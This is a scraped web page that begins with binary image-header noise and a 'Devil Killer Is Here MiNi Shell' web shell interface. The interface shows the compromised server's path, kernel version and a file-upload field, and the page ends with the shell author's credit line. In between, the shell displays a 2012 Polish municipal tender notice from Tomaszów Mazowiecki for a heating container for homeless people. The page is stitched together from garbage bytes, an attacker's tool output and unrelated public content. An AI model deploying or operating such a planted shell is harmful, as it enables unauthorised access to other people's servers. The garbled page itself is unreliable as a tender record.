JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121102/430358-N-2012.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Zakup kontenera i montaż na potrzeby uruchomienia  ogrzewalni 
w okresie jesienno - zimowym.</b><br>
<b>Numer ogłoszenia: 430358 - 2012; data zamieszczenia: 02.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Tomaszów Mazowiecki , ul. POW 10/16, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 724 23 11, faks 44 724 43 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-maz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup kontenera i montaż na potrzeby uruchomienia  ogrzewalni 
w okresie jesienno - zimowym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotowe zamówienia obejmuje:
1.	Zakup, dostawę (wraz z załadunkiem i rozładunkiem kontenera), posadowienie, montaż i podłączenie do istniejących instalacji zewnętrznych (elektrycznych, wodociągowych i kanalizacyjnych) typowego publicznego kontenera (wraz z zapleczem sanitarnym i infrastrukturą towarzyszącą) przeznaczonego na czasowe miejsce schronienia przed zimnem i mrozem dla osób bezdomnych z terenu miasta Tomaszowa Mazowieckiego zgodnie z Opisem Przedmiotu Zamówienia -Programem Funkcjonalno-Użytkowym, stanowiącym Część IV niniejszej SIWZ.
2.	Lokalizacja inwestycji - według Załącznika Nr 1 do Opisu Przedmiotu Zamówienia - Programu Funkcjonalno -Użytkowego (Część IV SIWZ) na działce ewidencyjnej nr 101/3 obręb 4,                        przy ul. Luboszewskiej 71 Tomaszowie Mazowieckim. 
3.	Montaż, posadowienie i podłączenie kontenera powinny odbywać się pod nadzorem osób posiadających  uprawnienia w specjalnościach:
konstrukcyjno-budowlanej,
instalacyjnej w zakresie sieci instalacji wodociągowych i kanalizacyjnych,
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. 
4.	Wykonanie   dokumentacji technicznej kontenera - ogrzewalni zawierającej rzuty, przekroje,               opis techniczny w branży architektoniczno-konstrukcyjnej, elektrycznej i sanitarnej. 
5.	Forma opracowania dokumentacji projektowej:
a)	dokumentację należy wykonać w 4 egzemplarzach w wersji papierowej,
b)	dokumentacja powinna być podpisana przez osoby posiadające uprawnienia w specjalnościach:
konstrukcyjno-budowlanej,
instalacyjnej w zakresie sieci instalacji wodociągowych i kanalizacyjnych,
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.  

UWAGA: dokumentacja powinna być dostarczona zamawiającemu w terminie trzech tygodni     przed planowanym montażem  i posadowieniem kontenera. 

6.	Do zakresu wykonawcy należy ponadto przedłożenie zamawiającemu  kosztorysu ofertowego               z podziałem na:
a)	wykonanie dokumentacji technicznej,
b)	roboty budowlane związane z podłączeniem kontenera do istniejących instalacji zewnętrznych (elektrycznych, wodociągowych, kanalizacyjnych),
c)	zakup, dostawę (wraz z załadunkiem i rozładunkiem kontenera), posadowienie i montaż  kontenerów - ogrzewalni
d)	kosztorys sporządzony przez wykonawcę służył będzie zamawiającemu w celach informacyjnych i poglądowych - 2 egzemplarze w wersji papierowej, 
e)	przygotowanie dokumentów powykonawczych, w tym m.in.: geodezyjną inwentaryzację powykonawczą, certyfikaty, deklaracje zgodności na zastosowane wyroby oraz paszporty         na wszystkie zamontowane urządzenia technologiczne.
7.	Szczegółowy opis, lokalizację i wymagania przedmiotu zamówienia podano w załączonym Opisie Przedmiotu Zamówienia - Programie Funkcjonalno-Użytkowym (Część IV SIWZ).
8.	Wykonawca nieodpłatnie przeniesie na zamawiającego autorskie prawa majątkowe do projektu powstałego na podstawie zawartej umowy w zakresie  wszystkich pól eksploatacji. 
9.	Wykonawca przeniesie  na zamawiającego autorskie prawa zależne do projektu, które obejmują jego opracowanie  oraz korzystanie  z opracowania i rozporządzania nim.
10.	Nomenklatura Wspólnego Słownika Zamówień (CPV): 71.25.00.00-5, 44.20.00.00-2, 44.21.23.20-8..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5, 44.20.00.00-2, 44.21.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany Formularz Oferty,
Pełnomocnictwo.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmiany istotnych postanowień umowy, w zakresie terminu realizacji zamówienia, technologii wykonywania robót na zasadach określonych w niniejszym paragrafie.
2.	Zmiana terminów realizacji przedmiotu umowy może nastąpić jedynie w przypadku zaistnienia następujących okoliczności:
1)	działania siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy, a których strony umowy nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie      lub skutki utrudniają lub uniemożliwiają wykonanie umowy zgodnie z jej treścią w szczególności: wojnę, działania wojenne, powódź, akty wandalizmu, awarie, katastrofy (które wystąpiły pomimo udokumentowanej wysokiej staranności zabezpieczającej wykonawcy)
2)	zmiany przepisów prawa mających wpływ na zakres lub terminy wykonania przedmiotu umowy                               w szczególności zobowiązujących do uzyskania dodatkowych dokumentów, uzgodnień, zgód, pozwoleń, opracowań;
3)	przedłużające się w stosunku do obowiązujących przepisów, procedury i postępowania administracyjne, cywilne, karne, w szczególności wydanie przez uprawnione organy decyzji o wstrzymaniu robót, z powodów,        za które wykonawca nie ponosi odpowiedzialności;
4)	działania lub zaniechania osób trzecich (np. organów administracji i innych podmiotów uczestniczących          w procesie opiniowania, uzgadniania itp.) nie spowodowane przez wykonawcę a także nieprzewidziane wejście   na teren budowy (prac) wykonawcy nie związanego z przedmiotem niniejszego zamówienia;
5)	realizacja przez innych wykonawców w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań;
6)	nietypowe i wyjątkowo niekorzystne warunki atmosferyczne o charakterze anomalii uniemożliwiające                      lub spowalniające prace lub roboty budowlane np. temperatura, wilgotność, opady;
7)	ograniczenia w dostępie do terenu;
8)	zmiany korzystne dla zamawiającego zmierzające do przyspieszenia zakończenia robót, zmniejszające        koszty, poprawiające sprawność lub jakość robót.
3.	Na wniosek wykonawcy  możliwa jest zmiana technologii lub sposobu realizacji rozwiązań projektowych        lub robót, w stosunku do pierwotnie przewidzianych. Zmiana możliwa jest jedynie w przypadku, gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie, jakościowo i technicznie od przewidzianego                       w dokumentacji projektowo-technicznej a jednocześnie nie spowoduje zwiększenia kosztów realizacji przedmiotu umowy. Na dokonanie zmiany druga strona niniejszej umowy muszą wyrazić pisemną zgodę. Strona wnioskująca            o zmianę zobowiązana jest na własny koszt opracować ewentualną zamienną dokumentację projektowo-techniczną oraz uzyskać odpowiednie decyzje, pozwolenia i dokonać niezbędnych uzgodnień. W opisanym stanie faktycznym zamawiający sporządza odpowiedni protokół wraz z uzasadnieniem zmian. 
5.	Wykonawca jest zobowiązany uzyskać każdorazowo pisemną zgodę zamawiającego na realizację ewentualnych prac zamiennych i dodatkowych. Zgoda taka musi być uzyskana przed rozpoczęciem tych prac. Jeżeli wykonawca dokona ich realizacji bez zgody zamawiającego, zamawiającemu przysługuje prawo do odmowy zapłaty wynagrodzenia z te prace. Za wyjątkiem robót mających na celu niezwłoczne zapobieżenie bezpośredniego zagrożenia bezpieczeństwa ludzi lub mienia, o czym wykonawca zobowiązany jest natychmiast zawiadomić zamawiającego i inspektora nadzoru. 
6.	Ewentualne roboty dodatkowe i uzupełniające mogą być realizowane wyłącznie na mocy odrębnych umów zgodnie z art. 67 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-maz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Mościckiego 6 pok. nr 6 - Wydział inwestycji Urzedu Miasta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2012 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie zamawiającego w Tomaszowie Maz. ul. P.O.W. 10/16 pok. 12 budynek A (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com